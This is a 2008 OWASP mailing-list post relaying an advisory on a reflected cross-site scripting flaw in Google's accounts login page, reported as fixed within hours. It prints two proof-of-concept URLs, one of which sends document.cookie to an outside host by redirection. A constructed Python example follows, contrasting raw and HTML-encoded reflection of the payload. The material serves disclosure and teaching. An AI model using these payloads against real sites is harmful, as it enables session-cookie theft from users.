[OWASP-Bangalore] Google accounts SSL login page suffers from highly critical XSS

Anil anil.sharma at teaqtech.com
Mon Nov 17 23:54:52 EST 2008


Google accounts SSL login page suffers from highly critical XSS

Written by Dimitris Pagkalos

Wednesday, 12 November 2008

In this case, the fact that SSL is being used on the login page does not
necessarily mean that the users' login information is secured. UPDATE: this
was fixed a few hours after publishing it.

Malicious people can exploit this Google XSS to propagate malware, spyware,
adware and steal authentication credentials.

XSS:
https://www.google.com/accounts/ServiceLogin?service=websiteoptimizer&hl=e%27%22%3E%3C/title%3E%3Cscript%3Ealert%281337%29%3C/script%3E%3E%3Cmarquee%3E%3Ch1%3EXSS%20by%20Xylitol%3C/h1%3E%3C/marquee%3En&continue=https%3A%2F%2Fwww.google.com%2Fanalytics%2Fsiteopt%2F%3Fet%3Dreset%26hl%3Den&utm_source=services&utm_medium=redirect&utm_campaign=standalone

Redirection and document.cookie PoC:
https://www.google.com/accounts/ServiceLogin?service=websiteoptimizer&hl=e%27%22%3E%3CSCRIPT%3Elocation.href+%3D+%27http%3A%2F%2Fwww.xssed.com/?%27%2Bdocument.cookie%3C%2FSCRIPT%3E&continue=https%3A%2F%2Fwww.google.com%2Fanalytics%2Fsiteopt%2F%3Fet%3Dreset%26hl%3Den&utm_source=services&utm_medium=redirect&utm_campaign=standalone


It is only a matter of minutes before we see it fixed by Google.

Regards

Anil
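Added example (not code from the advisory, the list post, or Google): a constructed stand-in for a login page that reflects the `hl` parameter into `<title>`, rendered once with raw interpolation and once with HTML encoding, plus a parser check that counts how many `<script>` start tags a browser would see in each. The page template and the shortened form of the page's first PoC URL are assumptions made for the demonstration.

```python
"""Reflected XSS via a <title> element: the untrusted hl value is reflected
into the page title. Constructed example; the template is a stand-in for
the real login page, not Google's markup."""
import html
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlsplit

# Shortened form of the first PoC URL on the page (the marquee part is dropped).
PAYLOAD_URL = ("https://www.google.com/accounts/ServiceLogin?service=websiteoptimizer"
               "&hl=e%27%22%3E%3C/title%3E%3Cscript%3Ealert%281337%29%3C/script%3E%3En")


def hl_from_url(url: str) -> str:
    """Return the percent-decoded hl parameter as the server would see it."""
    return parse_qs(urlsplit(url).query).get("hl", [""])[0]


def render_title_unsafe(hl: str) -> str:
    """Vulnerable: raw interpolation lets a '</title>' in hl close the element
    early, so whatever follows is parsed as ordinary markup."""
    return f"<html><head><title>Sign in ({hl})</title></head><body></body></html>"


def render_title_safe(hl: str) -> str:
    """Fixed: HTML-encode the value. <title> is RCDATA, so '&lt;' is shown to
    the user as '<' but can never open or close a tag."""
    safe = html.escape(hl, quote=True)
    return f"<html><head><title>Sign in ({safe})</title></head><body></body></html>"


class ScriptFinder(HTMLParser):
    """Count <script> start tags, i.e. script elements a browser would execute."""

    def __init__(self) -> None:
        super().__init__()
        self.scripts = 0

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.scripts += 1


def script_tags_in(doc: str) -> int:
    parser = ScriptFinder()
    parser.feed(doc)
    return parser.scripts


if __name__ == "__main__":
    hl = hl_from_url(PAYLOAD_URL)
    print("unsafe:", script_tags_in(render_title_unsafe(hl)))  # 1
    print("safe:  ", script_tags_in(render_title_safe(hl)))    # 0
```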
